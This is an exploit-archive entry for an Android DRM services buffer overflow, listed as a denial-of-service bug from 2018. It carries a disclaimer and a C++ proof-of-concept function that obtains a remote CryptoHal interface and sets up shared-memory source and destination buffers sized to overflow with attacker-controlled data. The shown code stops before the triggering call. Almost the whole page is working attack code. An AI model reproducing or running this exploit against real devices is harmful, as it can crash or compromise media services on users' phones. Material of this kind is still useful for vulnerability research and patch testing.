Exploits / Vulnerability Discovered : 2018-03-15 |
Type : dos |
Platform : android
This exploit / vulnerability (Android DRM services buffer overflow) is for educational purposes only; if you use it, you do so at your own risk!
static void executeOverflow()
{
// Get an interface to a remote CryptoHal object.
sp<ICrypto> crypto = getCrypto();
if (crypto == NULL) {
return;
}
if (!setClearKey(crypto)) {
return;
}
// From here we're done with the preparations and go into the
// vulnerability PoC.
sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
// This line is to merely show that we have full control over the data
// written in the overflow.
memset(heap->getBase(), 'A', DATA_SIZE);
sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
DEST_OFFSET);
int heapSeqNum = crypto->setHeap(heap);
if (heapSeqNum < 0) {
fprintf(stderr, "setHeap failed.\n");
return;
}
CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
.mHeapSeqNum = heapSeqNum };
// mNumBytesOfClearData is the actual size of data to be copied.
CryptoPlugin::SubSample subSamples[] = { {
.mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
ICrypto::DestinationBuffer destination = {
.mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
.mSharedMemory = destMemory };